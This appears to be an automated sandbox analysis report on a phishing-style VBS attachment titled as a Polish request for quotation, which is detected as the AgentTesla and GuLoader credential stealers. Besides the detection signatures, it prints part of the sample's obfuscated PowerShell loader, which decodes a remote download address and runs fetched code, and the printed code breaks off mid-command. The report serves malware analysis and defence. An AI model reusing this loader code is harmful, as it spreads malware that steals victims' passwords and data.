Windows
Analysis Report
Zapytanie ofertowe (GASTRON 07022024).vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected AgentTesla
Yara detected GuLoader
Yara detected Powershell download and execute
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides that the sample has been downloaded from the Internet (zone.identifier)
Hides threads from debuggers
Obfuscated command line found
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Very long command line found
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
wscript.exe (PID: 5532 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\Zapyt anie ofert owe (GASTR ON 0702202 4).vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) powershell.exe (PID: 4704 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "cls;write 'Kalyptra s Skamsttt ers Incorr odable248 Porsesnaps Spytslikk eren Docio us Thermoc auteries d okumentnav ne Nynazis tens Arsen iosiderite 11 Uncompr ehendingne ss Unobumb rated Bylr nbach sulf ovinate Sg elngder ma nhours nor therns Bnk boremaskin er Gangly Sorrower F armyardy S tofskiftes ygdommes K yllingemdr es Flygtni ngekatastr ofe Kalypt ras Skamst tters Inco rrodable24 8 Porsesna ps Spytsli kkeren Doc ious Therm ocauteries dokumentn avne Nynaz istens Ars eniosideri te11 Uncom prehending ness Unobu mbrated By lrnbach su lfovinate Sgelngder manhours n ortherns B nkboremask iner Gangl y Sorrower Farmyardy Stofskift esygdommes Kyllingem dres Flygt ningekatas trofe';If (${host}.C urrentCult ure) {$sub allocating ++;}Functi on Stemmet llerens($T egningsfil ){$Gearski fter=$Tegn ingsfil.Le ngth-$suba llocating; $Cordaital eannitielt 96='SUBsTR I';$Cordai taleanniti elt96+='ng ';For( $Co rdaitalean =2;$Cordai talean -lt $Gearskif ter;$Corda italean+=3 ){$Kalyptr as+=$Tegni ngsfil.$Co rdaitalean nitielt96. Invoke( $C ordaitalea n, $suball ocating);} $Kalyptras ;}function Pharmacis t($Unmicac eous){ & ( $Breakneck ) ($Unmica ceous);}$B anjernes=S temmetller ens 'ThMFa oUnzMii Cl MulHeas / a5Fi.,a0 C la(suWS.i AgnPaddio ,w TsPa ,e NHoTJ Op1S u0H,.A,0.w ;Go KWPii BnAl6 B4,n ;Co ,yx,e6 E4E.;Ds T ir Gv a: A 1Ca2S,1.i. Ar0Mu) R S ,GLieGicSp k AoR /I,2 S0P 1Ek0T i0.n1Az0Sk 1,e GrFUri l rreeJ f EoDaxT /Sa 1An2Fa1 .P a0 l ';$Fo rgelser=St emmetllere ns 'PoU Hs K,eElrPl- TAGeg,leHv nO.t H ';$ Spytslikke ren=Stemme tllerens ' AuhMatWat Op,us W:Ko /Bi/Bedt.r Nyi ,vDoeP r.SugEpoBe o PgMilSle D.,hc WoM mPr/.au P c B? neL.x epNooB.r BtPh=Dod.k oShwSen,al Beo Da Sd a&A,ia,d u =D 1.alUnB ._UbMBypS kg ,j -,iW SuW.ye RK, eK XAaPLoO .EGrBubmO uL .yN.iBr Kba3,rMS S SwcW OD,b ,2P.ySvdPe ';$Miseva luate=Stem metllerens 'Ar> P '; $Breakneck =Stemmetll erens ',ni VieTux.o ' ;$Hardbeam ='dokument navne';$Wi enerbrdsst ang = Stem metllerens 'ale FcM, hEuo K .a% Isa ap TpE fdPraFotJo aVa%Sy\SqV eeA iMen. alGee asHo sT..OmD Si Y,s G Jo&S p&Gi PneBu cSthKaoDd S t , ';Ph armacist ( Stemmetlle rens ' $ C gOblProFob SaUflMa:C .U dEusAmk R,rBoiArfB it FsTys b i .dTne Ur s n e sUn= P(UncStmF odKl .k/,e cKo Gr$,hW Si .eSknB ,eNorBlb B rUnd AsExs rt .aF.nS gF.)U. ') ;Pharmacis t (Stemmet llerens 'C h$ egz lF oTub.laMal ,a:ShPS.oG arPasNoeTh sP n Famop Res,s=,a$, nSNopheyG tEus.ulSti Vrk .k neH rToeA.nRa . SsT.pUnl HyiShtKu(F o$DiMDeiD, sPae evSba RlStu PaI t eSl) n ');Pharmac ist (Stemm etllerens 'Ta[HoN ,e .otPr. SHi ererL.vOvi ,ocmiep,P IoFliRen m tViM .aLen TraN,g Fe SrV,]Wa:Ma